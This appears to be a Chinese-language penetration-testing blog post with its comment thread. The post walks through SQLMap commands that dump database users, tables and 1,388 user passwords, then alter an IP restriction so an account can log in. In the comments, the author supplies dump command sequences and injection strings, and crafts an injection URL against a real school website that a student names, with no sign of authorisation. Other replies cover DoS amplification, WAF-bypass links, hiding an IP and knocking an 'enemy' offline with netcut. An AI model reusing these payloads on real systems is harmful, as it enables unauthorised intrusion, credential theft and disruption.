2014年4月12日 星期六

SQLMap 實戰(可怕的 SQL Injection漏洞)

隨意入侵別人的電腦是有罪的,本篇所述作為可能觸犯刑法第36章 妨害電腦使用罪 第358條到第361條,幸好本次作業是經高層主管核可的滲透測試,為了讓讀者明白系統存在SQL Injection有多可怕,特將測試過程中,有關SQL Injection入侵的結果與大家分享,千萬不要拿這種技巧進行非法入侵,否則後果自負!
SQLMap 是一套可以用來測試  SQL Injection並利用此漏洞的強大工具,當系統存在SQL Injection時,大都(不是全部哦!)可利用 SQLMap取得機敏資料,底下是SQLMap的操作步驟:
註:基於保密原則,涉及特定的系統資料會適當隱蔽!
一、 post與get 對 SQLMap的差異
網路上許多教SQLMap的教學資料是以 get 的方式提交資料,因為用 get 的方式比較單純,易於講解,但現在網頁的寫作越來越注重安全,設計師都知道在關鍵網頁要使用 post 方式提交資料,SQLMapget 提交方式對 post 網頁起不了作用,所以必須針對採用 post 提交的網頁事先預做處理,才能透過 SQLMap 來進行滲透。
get 的提交方式,欄位及其值直接於 URL 輸入,只要一串文字即可進行SQLMap滲透(如下例)
sqlmap -u "http://URL/PAGE?cityid=2&m=1" -p "cityid" -v 5
 可是 post 的提交是透過網頁的 <form></form>區段,首先利用 LocalProxy(如OWZAP、WebScarab)攔截對有漏洞網頁的提交,然後將 Request Header 的資料存成文字檔。這個文字檔就是要提交的 form 內容。而 SQLMap 的語法也改成:
sqlmap -r 文字檔路徑檔名 -v 5
二、發現漏洞
利用 SQL Injection 進行滲透,當然就是要先找到漏洞所在,恰巧這個系統存在一個(還真只找到這一個),檢視其原始碼,它是利用 post 提交,而提交的對象是自身,所以我們就將它的 Request Header存成文字檔(DsdXMLQuery.RAW)
手動測試發現有SQL Injection漏洞

查看原始碼,發現 Action 的對象是自身,而有漏洞的欄位是「htx_sTitle」

將此網頁的 Requeest Header儲成文字檔(DsdXMLQuery.raw)

三、利用SQLMap 進行滲透
首先用  sqlmap -r DsdXMLQuery.raw -p "htx_sTitle" ,讓 SQLMap 測試 DB Server 的環境資訊
-r 是指定 Request Header  的來源檔
-p 是指定有SQL Injection 的欄位,如果要測試多個欄位,可以用  , 分隔,例如: -p "fd1,fd2"  ,多欄位時,記得要用 " " 括起來!
發現作業系統、資料庫系統 及網站系統資訊

利用:sqlmap -r DsdXMLQuery.raw -p "htx_sTitle" -v 5 --current-user 查得連線資料庫的使用者是 「????user」(因為使用者名稱會洩漏受測機關,所以用????代替)

利用 sqlmap -r DsdXMLQuery.raw -p "htx_sTitle" --users -v 0 查詢 DBMS 可能的使用者資料,得知僅建立兩名使用者   sa  與   ????user

利用 sqlmap -r DsdXMLQuery.raw -p "htx_sTitle" -v 1 --dbs 查詢可能的資料庫,其中 Eservice98 與 ????EPP 是使用者建立的資料庫,經多次測試結果,確定本系統是使用 ????EPP 這個資料庫。

針對 ????EPP 資料庫,利用  sqlmap -r DsdXMLQuery.raw -p "htx_sTitle" -v 1 -D ????EPP --tables,測得共有 148 個 資料表,其中有一個資料表  InfoUserA ,研判應是使用者帳密資料表(其實之前我已先後測了 Account, Member,但表中都沒有資料),可是用 SQLMap 測試,卻都沒有資料回應,後來猜想是不是 SQLMap弄錯名稱,所以改用 InfoUser 再測,終於發現這是使用者資訊檔!
SQLMap 猜測的資料表名稱,有時會錯,所以不是測到的就都是可用的
找到 148  個資料表

緊接著用  sqlmap -r DsdXMLQuery.raw -p "htx_sTitle" -v 1 -D ????EPP -T InfoUser --columns -v 1 找出 InfoUser 的欄位組成(截圖略)

再來用 sqlmap -r DsdXMLQuery.raw -p "htx_sTitle" -v 1 -D ????EPP -T InfoUser -C "UserId,UserType,Password" --dump -v 1 將資料表中的 UserId, UserType, Password 三個欄位資料傾印出來,共有1388筆。
由於密碼是設計者自創的加密方式,太容易破解了,所以將部分內容予以隱蔽!

到這裡,已取得使用者資訊,但還必須去猜測管理員帳號,由於猜測管理員不是 SQLMap 的工作,請讀者自行從帳號裡去找!
 不過像這樣傾印所有使用者的做法,耗費太多時間(我花了2天才猜到40幾筆),通常我會試著找有沒有  %adm% 或  %sys% 或 %super% 或 %mgr% 或 %manag% 的帳號!

四、後記
在嘗試利用找到的帳號登入時,發現部分帳號是有鎖IP 的,這時候就可以利用 sqlmap -r DsdXMLQuery.raw -p "htx_sTitle" -D ????EPP --sql-query "UPDATE InforUser Set NetMask3=0, NetMask4=0 Where userid='sysopp1';"  將 IP 限制的範圍放寬(當然也可以將 IP 改成滲透的那台電腦,只是這樣管理員就無法登入,入侵行為很快就會被發現!
雖然取得帳密,但帳號有鎖IP,還是進不去

將 NetMask3, NetMask4 改成 0,放寬限制的區段

放寬後,再重新嘗試登入 ,已可成功登入了!

再叮嚀一次,千萬不要隨意去入侵別人的電腦,這是要負刑責的!

60 則留言:

  1. 大大,一般HACKER在找尋後台網址,基本上是使用甚麼工具, 因為我使用Havi1,但他提供字典檔有限,因此有時要自己去try,因此比較費時。


    回覆刪除
    回覆
    1. 我個人慣用 OWASP ZAP,它有提供7套大小不同的字典檔,但不知別人都用什麼工具,至於字典檔是免不了的,外國人常用的字典,不一定適合台灣環境。ZAP的字典檔可以自己增加,所以可以在平時瀏覽時就搜集,尤其可以對同一家公司的網站做成單獨的字典檔。
      ZAP 的字典檔是在安裝目錄下的「dirbuster」子目錄,字典檔本身就是文字檔,所以自行編輯也很容易。

      刪除
    2. 除了網址的暴力破解外,個人也建議自己搜集密碼的字典檔,因為台灣很多企業的公用密碼幾乎都會帶上企業名稱縮寫,還有特殊符號喜歡用 @ # ! 及空白,這些用外國的密碼字碼,可能函蓋不到。

      刪除
    3. 非常感謝大大解困或,你第二本書今日已經入手了!!!!

      刪除
    4. https://wiki.skullsecurity.org/Passwords 字典檔

      刪除
    5. wooyun之前就有用蜜罐收集了不少密码

      刪除
  2. 大大提供的 OWASP ZAP 是前10大熱門程式,但大大文章說真的的確太多教學都是介紹GET提交的,已經買了大大出的第二本新書,比起一般檢體書還更來有介紹POST提交,我買的幾乎都是GET提交.....而且還是簡單介紹........
    本小想知道哪裡還可以更深入學習SQLMAP的技巧。

    回覆刪除
    回覆
    1. 我當初覺 SQLMap 時,老師也是教 GET 的用法,乍聽覺得很神奇,真正上戰場才發現不是那麼一回事,大部分的網站都是用 POST 提交資料,所以自己爬了很多文章,也直接從 SQLMap 的Help (man sqlmap)裡去「試驗」。
      在學習過程中,我沒有找到一本真正澈底介紹sqlmap的中文書(抱歉,我自認英文不好,所以都找中文書),不過我相信您在真正接觸實務一段時間後,逐漸了解 WEB 及 SQL 語法的的原理後,就能得心應手了!
      「http://sqlmap.org/」是 SQLMAP的官網供參,我自己在上面沒找著更深入的資訊啦! (找得不夠深)

      刪除
  3. 如果資料庫有的話,可以用sqlmap找得到..

    問一下,有人能把網站解析出很多東西, ex:DNS,IP等
    是用甚麼程式?
    大大用kali誒?!

    回覆刪除
    回覆
    1. 我不知道那一組工具可以同時提供這麼多資訊,一般在進行滲透時,為了求時間,我個人都是先用 whois, netcraft, twnic 先取得 dns 資訊,再從其中的email, dns-server 資料,利用 theHarvester繼續去挖。

      如果您是要做駭客,可以再搭配maltago,它能尋找到更深更廣的資訊。但滲透測試因為有時間壓力,且不能對指定範圍以外的標的進行攻擊(主動式探索),所以工具使用上有諸多限制。

      有關前期的資訊叫「探勘」、資訊收集或「踩點」,相關工具可參考「Kali Linux 滲透測試工具」的第七章或「網站滲透測試實務入門」的第五章。
      (如果您知道有整合型而且是免費的工具,也請告訴我,謝謝)

      刪除
    2. 學而後知不足,您當時問的工具,我最近才在 FireFox的附加元件中發現,就是 IP Address And Domain Information 這套工具(也是一個網站),它會同時分析出Whois、DNS、Tracer....等資訊,希望現在回答您,還不會太晚。

      刪除
  4. 我有滲透問題,滲透之前需要尋找注入點以及為保護的變數,請問大大手工是何如能判斷htx_sTitle為漏洞?
    因為現在很多網站將破解符號都全部過濾掉,因此我現在可能不曉得該如何使用,也有其他大大說明大部分也已經靠工具來判斷了.....

    另外我使用OWASP找尋到SQL注入,漏洞顯示是 下載的URL ,書上說這不一定是正確,那我該如何判斷注入點..... 漏洞在 警告上面下載url的Attack 欄位上 下載的變數 如【php?file= $&%^$%&@&^%@^ or 1=1 --】 剩下的我已經在書上打轉一直在找重點= = 理解可能不曉得的我在嘗試想將漏洞使用在sqlmap上.....

    回覆刪除
    回覆
    1. 首先,我不建議用手動測試,那只是為了向主管炫耀罷了,建議用 ZAP,只要ZAP有找到可能的 SQL Injection欄位,就可改用 SQLMAP。

      如果直的想用手動測試,一般都是先用 'or7>3-- 或者 or 7>3-- 做第一步測試,看它吃不吃特殊符號,如果不行,就將前面的測試字串做url encode 或 16進制編碼或unicode編碼,一樣看它吃不吃,如果這三種只要有一種可以成立,就幾乎可以斷定有 SQL Injection,為什麼說「幾乎」,因為有些人會設密罐騙我們上當。

      如果這三種手工都不能成立,就不要執著要用手動去測式了,直接拿 SQLMap 去試吧! 畢竟程式測試的速度會比手動快。至於碰到多欄位的情形時,就要多次分欄位用SQLMap試。

      我不曉得這一段【php?file= $&%^$%&@&^%@^ or 1=1 --】是怎麼來的,但如果file欄位真有SQL Injection漏洞,用 【php?file= ' or 1=1 --】或【php?file= or 1=1 --】可能可以啟動檔案下載(我通常不會用 1=1 而是用不同的數字做 > 或 =或<=或<>,原因是 1=1太容易被判斷)。

      別笑我懶,手動測試只是為了炫耀,不要跟自己的時間過不去,有工具就用工具,如果您有「網站滲透測試實務入門」這本書,可以參考 113、150 如何利用 ZAP 測試欄位的弱點,再利用 173頁的 SQLMap進行SQL Injection 破解。

      刪除
    2. 大大兩本書我都有買,然而這個注入可以直接做下載,只是因為上面太多英數混合懶得打所以就打上如.... 只是得到此漏洞從書上範例的指令還是不知怎樣轉成SQLMAP,我很努力看了><,可能真的是我理解爛吧,有可能把所有都看成重點, 是否是使用-p方式 ? 我是測試我校LeeMing的化妝系 ,直接說明目標網站大大比較好解釋,而漏洞測試完我會主動告知

      刪除
    3. 以您的例子,假設有漏洞的網址是 「http://127.0.0.1/download.php?file=myfile.txt」,也就說 file 欄位存在SQL Injection漏洞。
      sqlmap -u "http://127.0.0.1/download.php?file=myfile.txt" -v 5
      這一行是基礎的用法,會猜測資料庫的類型,因為只有一組欄位,所以不用 -p 指定猜測的對象,如果有多個欄位,可以用 -p "file" 指定猜測的對象。

      偷懶的做法是直接用下列指令,可是執行時間會很久,長者可能要一、兩天
      sqlmap -u "http://127.0.0.1/download.php?file=myfile.txt" -v 5 --level= 5 --risk=3 --dump-all --batch
      這行指令會嘗式將所有資料庫、資料庫裡的表格、表格裡的資料都列出來。

      或者依序執行
      1. sqlmap -u "http://127.0.0.1/download.php?file=myfile.txt" -v 5 -b '猜 DBMS,假設猜到是「Microsoft SQL Server」

      2. sqlmap -u "http://127.0.0.1/download.php?file=myfile.txt" -v 5 -dbms="Microsoft SQL Server" --current-db '猜目前系統連線的資料庫,假設是 「userdatas」

      3.sqlmap -u "http://127.0.0.1/download.php?file=myfile.txt" -v 5 -dbms="Microsoft SQL Server" -D userdatas --tables '猜資料庫中有哪些資料表,假設有一個是 account 資料表

      4.sqlmap -u "http://127.0.0.1/download.php?file=myfile.txt" -v 5 -dbms="Microsoft SQL Server" -D userdatas -T account --columns '猜資料表中有哪些欄位,假設對 id 及 pwd 這個欄位有興趣

      5.sqlmap -u "http://127.0.0.1/download.php?file=myfile.txt" -v 5 -dbms="Microsoft SQL Server" -D userdatas -T account -C "id,pwd" --dump '就可將 id, pwd 的內容讀出來(完畢~~)
      ----------------------------------------------------------------------------------------------------------
      希望這則回應對您有所幫助!

      使用 SQLMap,基礎用法,就是這則回應前頭提到的兩組語法,在滲透測試時,只是為了證明弱點,及提權需要,通常是用1~5的五個步聚,雖然執行比較繁瑣,但比較不會造成過多不必要的交易。

      刪除
    4. 大大 【=WVhSMFlXTm9MelU0TDNCMFlWOHpNamd6WHpNeE9UUTVPVGRmTnpJek5EWXVaRzlq or 1=1 --】 這個欄位是從ZAP上的SQL INJECTION警告發現的

      而此漏洞是完整URL是"http://dac.lit.edu.tw/bin/downloadfile.php?file=WVhSMFlXTm9MelU0TDNCMFlWOHpNamd6WHpNeE9UUTVPVGRmTnpJek5EWXVaRzlq+AND+1%3D1+--+&fname=HDJHUWEH35OPFDUX150151PK45YXGHLO14EDOPUT35NL14CH45IHHCCH51OPNPQPMLVTFDCHKLNLRLEH51RP5145UTFDSX4545A5FD40MLOPDGOPSTSTKOPK

      但以上還是謝謝大大告訴我這麼多,得到知識了

      刪除
    5. 我想您可以試看看
      http://dac.lit.edu.tw/bin/downloadfile.php?file=xs%27+OR+4%3C%3E3+--+&fname=xs

      上面URL中 + 代表空白,瀏覽器會自動將空白轉成 +
      %27 是 '
      %3C%3E是 <>
      所以人眼看到的是
      http://dac.lit.edu.tw/bin/downloadfile.php?file=xs' OR 4<>3 -- &fname=xs
      這支程式會擋 1=1, 2=2,... 之類的測試,但用 4<>3 或 4>3 好像不擋。
      要測試這種URL,您必須先找到一個可以下載的檔案,才好繼續測試 SQL 注入,否則很難判定有無成功,最好先抓至一組合法的檔案下載URL,例如
      http://dac.lit.edu.tw/bin/downloadfile.php?file=readme.txt&fname=readme.txt,再用這組合法的URL去逗 SQL

      刪除
    6. 發現我的問題http://atic-tw.blogspot.com/2014/04/sqlmap-sql-injection.html?showComment=1448470590538#c2935677325858826591
      和王柏文題主問題一樣。
      就是 ZAP 掃描出 SQL 注入漏洞,但是不知道怎麼利用。[ZAP Attack 欄位給出的提示,怎麼使用的問題]

      刪除
  5. 請問大大 如果有waf就無法使用sqlmap? 還是有什麼方法可以破解

    回覆刪除
    回覆
    1. 當對方有防火牆,表示他很注重安全,即然有防護,就不易破解,甚至無法從外攻,所以您要找出如何「迴避」防火牆的方法,這必須去分析回應的現象,甚至您多試幾次,都可能被對方封鎖。
      做滲透測試基於時間壓力,通常就視為無法突破。至於真實世界,工具不止一種,不能打SQL Injection,可以視社交工程,不能從外打,就想辦法從裡反。

      刪除
    2. 我有買大大的書,我試著用大大躲避偵測的方法,都沒有什麼用,所以想問問看,那我要使用什麼工具去做裡返

      刪除
    3. 首先感謝您的支持。
      工具是用來提高作業效率,並不能辦我們創造漏洞,SQLMAP是在對方存SQL Injection時才有用處,並不表示用了SQLMAP就可以無往不利,實務上,打不下來的比打下來的多。
      從裡反,就用社交工程吧! 但至少要了解對方有什麼弱點,才知道放什麼木馬,至於工具:SET、Metasploit書上都有提到。重點是對方要有可被利用的漏洞。

      刪除
    4. 可是我覺得匿名者這個駭客組織感覺很輕易的就可以癱瘓,他們就只是透過ddos攻擊嗎??? 還是有其他攻擊?

      刪除
    5. 如果您指的是反課綱那件事,詳細看過新聞,他們不過是「癱瘓」政府部分機關的全球資訊網幾十分鐘,連一般的駭客都懶得用的方法,根本稱不上「癱瘓」,只是阻塞,就算是香港佔中事件,只也是比誰的機器能量大而已,是弱點,但不是漏洞。

      刪除
    6. 謝謝大大,想請問大大,我可以用 setoolkit確實可以仿造網頁,可是只限制virtualbox裡面的瀏覽器,我用電腦本身的瀏覽器就找不到網頁,要如何解決,感謝大大

      刪除
    7. 您用 ping 指令,從電腦本身 ping virtualbox 裡的Kali 位址,可以ping 得到嗎? 如果ping 得到,應該就可以用瀏覽器看這個網頁,如果Ping 不到,那應該是網路設定問題,沒有看到實際環境,很難給您建議。

      但幾個大方向:通常 virtualbox 的 Guest 網卡是設成 NAT ,網址大概是 192.168.xxx.yyy,這是私有IP,外部機器是看不到的,檢查 PC 本身的IP 是否在相同區段(192.168.xxx. )內,如果不在同區段,又沒有gateway 做橋樑,就沒有辦法連到 virtual 內的機器。

      刪除
    8. http://drops.wooyun.org/tools/4760
      http://www.freebuf.com/articles/1000.html
      http://bbs.ichunqiu.com/thread-1668-1-1.html

      關於繞過WAF,這三篇文章可以幫到你

      刪除
  6. 每次在virtualbox裡面的ip都是10.0.1.15好像是這個,可是我電腦本身的ip跟大大說的格式差不多,而且我要用竊取wifi時候 完全搜不到 謝謝大大解答

    回覆刪除
  7. 請問大大,如何將虛擬機器kali裡面的ip更改成我電腦的ip?如果我在pc上用syn攻擊,是否會造成很大的影響力

    回覆刪除
    回覆
    1. 將 guest 的IP 改成 bridge mode ,此時它會跟 host 同一level,但是會向dhcp 索取另一組IP。例如您的host 是 165.33.172.13,那你的 guest 可能會是 165.33.172.56 之類。
      另一種是採用 固定式 port mapping,但我不知道 virtualBox 支不支援 port mapping。

      對不起,因為我的筆電固障,這兩天都在修電腦,現在才回覆。

      刪除
    2. 謝謝大大,我有幾個問題想問,syn攻擊網站效能很大嗎? 還有疾風病毒是如何製作的?我點選大大的文章分類都沒有跑分類文章出來,謝謝大大 麻煩您了 不好意思~

      刪除
  8. 請問大大 syn是否攻擊效力不好,有的ip有用有的沒用 哈哈?還有為啥我點旁邊文章分類都沒顯示文章,都跳同一頁...?疾風病毒要用哪個工具製作?

    回覆刪除
    回覆
    1. 1. 首先向您說抱歉,製作病毒不是我的專長(好久不碰了),所以無法告訴您疾風病毒如何製作。

      2. 至於您問「syn攻擊」是指利用 Syn flood進行DoS攻擊嗎? 效力很大啊! 如果您能控制200台殭屍,利用這些殭屍電腦對同一台機器進行SYN攻擊,威力就不同了,但如果只靠一台機器,要對另一台機器進行 SYN flood,以目前的機器能量,幾乎沒有啥效果啦!
      簡單地說,除非找到對方致命的漏洞(如 Buffer overflow),才能靠一台機器搞垮一台伺服器,不然就得靠DDoS或者找一大群朋友聯合攻擊,不然單靠一台電腦發動Syn Flood 不會有什麼效果啦!
      3. 有關您提到網誌的「文章分類」沒有作用, 我測試並沒有發生您講的情況,經測試會切換到分類文章的清單(我的瀏覽器是 FireFox 41)

      刪除
  9. Buffer overflow可以針對web去攻擊嗎? 難怪syn沒有什麼作用 哈哈,那大大會控制殭屍嗎???(我是個新手~) 還有syn的防禦很難嗎?

    回覆刪除
    回覆
    1. Buffer overflow 要找Web Service 的程式,而不是網頁本身,就是說要找 ASP, ASP.NET, PHP, ... 的解譯環境是否存在此漏洞,還有引發的字串等,才有可能觸發。

      還有我不是駭客,不會做控制殭屍的事情! (違法地)
      在概念上,殭屍是被下蠱後才能遠端遙控,不是隨便就能控制別人的電腦。不要想壞事啦! 如果要靠駭客賺錢,建議從逆向工程下手,學會抓漏洞會賺得比較多。攻擊只會招來麻煩。

      刪除
    2. 增加機器能量該換什麼硬體??? 大大會使用NTP放大攻擊或是DNS放大攻擊嗎? 先學會技巧,再去學防禦 哈哈!!

      刪除
    3. 如果是自己打自己,就找一台Linux去打Windows應該會有效果,如果要打別人,想想網路頻寬的限制,再快的機器也沒用,就算您家裡用80M/20M的光纖,相對於現在硬體,根本不成對比,何況從您的機器到目標機器要經過多少路由器、閘道器。

      至NTP或DNS Flood攻擊就是偽造請求封包,雖然由你的機器發出請求,但把來源位址換成攻擊目標的,讓NTP或DNS回應時都向到攻擊目標,實際上靠您自己的一台機器發動NTP或DNS flood 攻擊,效果仍然有限,不然在學運期間「亞洲匿名者」的攻擊怎麼只是曇花一現,現今IPS都會協防此類攻擊,當成學術研究看看就好。總之要發揮DoS的威力,還是要靠DDoS,單一台機器只是拿來了解原理罷了。

      還有,我真的不是駭客(很怕被抓),不會去進行 NTP或是DNS放大攻擊。

      您問了那麼多有關DoS的攻擊,是有得罪您了嗎?如果在公司裡頭,去找一支netcut的小工具試試,或許可以暫時讓仇人斷線。

      看您好像對駭客技巧很有興趣,可以報名 CEH 認證班,裡頭會教您好多工具及原理,不過這些手法都有點成熟了,所以防守方也都知道防護之道。

      刪除
    4. 課程有點貴,我只是個學生,有點負擔,可是又對駭客技巧有興趣!!! 大大學那麼多駭客技巧,應該也會隱藏IP吧~~~ EX:「匿名者」

      刪除
    5. 沒有什麼是隱藏IP,不過是轉一台或幾台Proxy出去,上網去下載就有了,我個人是使用 SecurityKISS,其實我的工作不用隱藏IP,這些都只是為了做實驗罷了,如果真要躲好一點,可以利用 Proxy Chain。
      但千萬不要以為真的可以隱藏IP,只是政府覺得「值不值」得抓而已啦!再怎麼樣,都得透過中華電信的主幹網路才能「出國」,流量可以被分析。匿名者不易抓是因為「跨國」,您若去打沒邦交的小國,對方通常是求償無門,如果您是繞國外一週再回來打自己人,那就難說了,所以我都勸人想當駭客,就去做白帽,別人出錢出目標讓您練習,有錢賺又不犯法。
      CEH認證目前還值錢,趁年輕搞一張,可以提高身價,建議您可以考慮!

      刪除
  10. 請問一下 如何加入anonymous 那該有的駭客技術有哪些???

    回覆刪除
    回覆
    1. 對不起! 我也不知道如何加入 anonymous,聽說(只是聽說)他們是一個沒有組織的組織,也就是需要時你可以隨時幫忙,平時各幹各的。也因為這樣,所以FBI拿他(們)沒輒!

      刪除
  11. 我是個學生,應該沒人會出錢讓我練習吧...

    回覆刪除
    回覆
    1. 網路上有許多練習的網站及Linux建置的虛擬機,練好您的基本功,畢業後投身資安公司,您會有很多機會練習,別人還付您錢呢!

      刪除
  12. 封鎖ISIS twiter帳密是用什麼方法???

    回覆刪除
    回覆
    1. 用暴力猜密碼方式,讓錯誤次數達到一定量,系統就會自動鎖定!

      刪除
  13. 大大,我使用 ZAP 掃描出一個 SQL 注入漏洞。如下圖
    http://i.imgur.com/5ZT939w.png

    Request Header 存檔為 test1234.raw
    我使用 “sqlmap -r test1234.raw --technique=S --level=5 risk=3 -p "/is_more-1" --dbms=mysql” 命令。
    貌似 sqlmap 又盲注檢測了一遍,很是花時間。過程中提示存在此 Stacked queries 漏洞。最後失敗。

    我想請教一下上圖情況 SQLmap 滲透命令應該怎樣寫?我命令肯定有誤。

    test1234.raw 里 GET http://forum.test1234.com/?/is_more-1=%25%22%3BSELECT+SLEEP%285%29%23 HTTP/1.1

    sqlmap提示:
    [WARNING] it appears that you have provided tainted parameter values ('/is_more-1=%25"%3BSELECT SLEEP(5)#') with most probably leftover chars /statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly

    -p 是指定有 SQL Injection 的欄位,parameter
    Attack 欄位要怎樣指定?讓 sqlmap 針對性檢測和注入。
    能否告知命令並解釋一下?

    另外:SQLmap自定義payload能否開文講解一番?

    回覆刪除
    回覆
    1. 1.sqlmpa給的訊息是說你可能把攻擊的資料也一併算到網址裡頭,請你只要留下合法的欄位及值。
      利用 ZAP 掃出來,還要人工確認,手動測試 http://forum.test1234.com,似乎找不到 is_more1 這個欄位,就算手動隨意調整值,網頁似乎也沒有不同變化,無法確認它 有 SQL Injection存在,您可以分別手動輸人
      http://forum.test1234.com/?/is_more1=1
      http://forum.test1234.com/?/is_more1=1'
      http://forum.test1234.com/?/is_more1=15
      http://forum.test1234.com/?/is_more1=1>1--%20
      http://forum.test1234.com/?/is_more1=1'>'1'--%20
      似乎網頁都能正常顯示。

      2. sqlmap -r test1234.raw --technique=S --level=5 risk=3 -p "/is_more-1" --dbms=mysql

      -p 應該是 is_more-1 ( -p "is_more-1"
      http://forum.test1234.com/?/is_more1=1%27%3E%271%27--%20

      3. 有關 SQLMap payload,很抱歉! 我跟您一樣都還在學習,這裡有一篇,看能否對您有所幫助:http://www.freebuf.com/articles/71652.html

      4. 我沒有遇過在網址中的路徑是用 /?/ 或許需要利用檢視原始碼方式確認注入點

      刪除
    2. 多謝大大答复。
      回 1 ,懂了,%25%22%3BSELECT+SLEEP%285%29%23 是 Attack 欄位,攻擊參數作為了網址一部分。
      回 2 ,如果 -p 是 is_more-1 ( -p "is_more-1" )
      sqlmap 給出的結果: [CRITICAL] all testable parameters you provided are not present within the given request data

      -p "/is_more-1" 是正確的。

      刪除
  14. 請問一下,有個勒索病毒,會將所有檔案加密,去進行勒索,請問這個病毒用什麼做的,有的解嗎?

    回覆刪除
    回覆
    1. 我猜是用C寫的,這樣體積才會小,不過加密功能目前所有程式語言都可以實作,我不確定勒索病毒是用什麼語言。
      有沒有解?下三篇文章您可以參考,有Key就能解,想用暴力破解,我想這輩子可能都解不出來。

      http://www.ithome.com.tw/node/83529
      http://www.ithome.com.tw/node/83226
      https://www.kocpc.com.tw/archives/55200

      刪除
  15. 請問一下第一版的Kali Linux Page 12-6,sqlmap常用指令範例第一個是不是有錯呢?最後一個參數 -d cityid,應該是 -p cityid ?

    回覆刪除
    回覆
    1. 感謝您的指正,書上的確錯了,是 -p 才對。
      同樣的錯誤也發生在第二版的 11-6 頁,還好是同頁下方的實例說明沒有打錯。

      謝謝

      刪除
  16. 請問一下您對RSA加密 和公鑰私鑰有研究嗎?

    回覆刪除
    回覆
    1. 抱歉! 沒有研究,都是用人家寫好的工具。

      刪除
  17. 回覆
    1. 請參考「Kali Linux滲透測試工具 第二版」這本書的第11章 11.1節的實例就是這個網站。

      刪除
  18. 網誌管理員已經移除這則留言。

    回覆刪除
  19. 請問,如果使用SQLMAP,後端SERVER有過濾INPUT內容的時候,這時候要怎麼測試有沒有SQL injection問題? 因為使用SQLMAP都得到 all tested parameters appear to be not injectable 的結果,已經以最高等級的level跟risk打過了。求解....

    回覆刪除
    回覆
    1. 對我來說,SQLMAP測不出來,就認定它沒有SQL Injection的問題,SQLMAP是集眾人智慧的測試語法,如果連它都測不出來,我也測不出來。

      抱歉,以我的功力,還無法回答您的問題。

      刪除